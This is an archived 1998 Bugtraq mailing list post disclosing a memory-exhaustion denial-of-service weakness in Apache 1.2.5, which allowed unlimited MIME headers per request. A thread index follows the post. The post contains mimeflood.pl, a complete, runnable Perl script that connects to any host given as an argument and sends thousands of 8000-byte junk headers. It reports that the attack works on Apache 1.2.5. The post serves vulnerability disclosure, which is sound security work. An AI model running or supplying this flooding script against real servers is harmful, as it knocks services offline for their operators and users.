Bugtraq mailing list archives
Web servers / possible DOS Attack / mime header flooding
From: facq () U-BORDEAUX FR (Laurent FACQ)
Date: Thu, 3 Sep 1998 12:34:22 +0200
#! /bin/perl # mimeflood.pl - 02/08/1998 - L.Facq (facq () u-bordeaux fr) # Web servers / possible DOS Attack / "mime header flooding" # # looking at the apache 1.2.5 source code i found # that there was no limit on how many mime headers could # be included in a client request. The only limits # are : 8192 byte for each header, 300 sec. on reading headers. # # => by sending a crazy amount of 8000 bytes headers, it's possible # to consume a lot of memory (and of course CPU). The point # is that httpd daemons grow and STAY at this big size (or die # if you send too much) # # -> may be a limit on mime header number could be added. # # -> may be other web server could be vulnerable to this problem. # # - i tried on an apache 1.2.5 -> it works # - i didnt installed 1.3.1 but looking at the source code, # i think the problem is there too. # ################################################## #From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420 # #[...] #> #> -> may be a limit on mime header number could be added. # #Such limits have already been added to 1.3.2-dev. # #.....Roy use Socket; # Usage : $0 host [port [max] ] $max= 0; if ($ARGV[2]) { $max= $ARGV[2]; } $proto = getprotobyname('tcp'); socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto); $port = 80; if ($ARGV[1]) { $port= $ARGV[1]; } $host = $ARGV[0]; $sin = sockaddr_in($port,inet_aton($host)); connect(Socket_Handle,$sin); send Socket_Handle,"GET / HTTP/1.0\n",0; $val= ('z'x8000)."\n"; $n= 1; $|= 1; while (Socket_Handle) { send Socket_Handle,"Stupidheader$n: ",0; send Socket_Handle,$val,0; $n++; if (!($n % 100)) { print "$n\n"; } if ($max && ($n > $max)) { last; } } print "Done: $n\n"; send Socket_Handle,"\n",0; while (<Socket_Handle>) { print $_; }
Current thread:
- Re: Security Hole in Axent ESM Jeffrey Hutzelman (Aug 31)
- Re: Security Hole in Axent ESM Caskey L. Dickson (Sep 01)
- Re: Security Hole in Axent ESM Taral (Sep 02)
- Re: Security Hole in Axent ESM Patrick (Sep 02)
- Borderware predictable initial TCP racer-x () ALTAVISTA NET (Sep 02)
- Re: Borderware predictable initial TCP Aggelos P. Varvitsiotis (Sep 03)
- Web servers / possible DOS Attack / mime header flooding Laurent FACQ (Sep 03)
- Re: Web servers / possible DOS Attack / mime header flooding Vanja Hrustic (Sep 03)
- wwwboard.pl vulnerability bugtraq (Sep 03)
- Re: Web servers / possible DOS Attack / mime header flooding Rich Wood (Sep 03)
- Re: Web servers / possible DOS Attack / mime header flooding Daniel Leeds (Sep 03)
- Re: Web servers / possible DOS Attack / mime header flooding Lars Eilebrecht (Sep 03)
- Re: Security Hole in Axent ESM Taral (Sep 02)
- Fwd: [ISN] Another BO detector that is actually a trojan Reuben Yau (Sep 03)
- Security Bulletins Digest (fwd) Piotr Strzy¿ewski (Sep 03)
- Back Orifice detection and removal The Late Ian Angles (Sep 03)
- Re: Security Hole in Axent ESM Caskey L. Dickson (Sep 01)
- Cisco Security Notice: PIX Firewall Manager File Exposure psirt () CISCO COM (Sep 02)
- <Possible follow-ups>
- Re: Security Hole in Axent ESM Jim Dennis (Sep 03)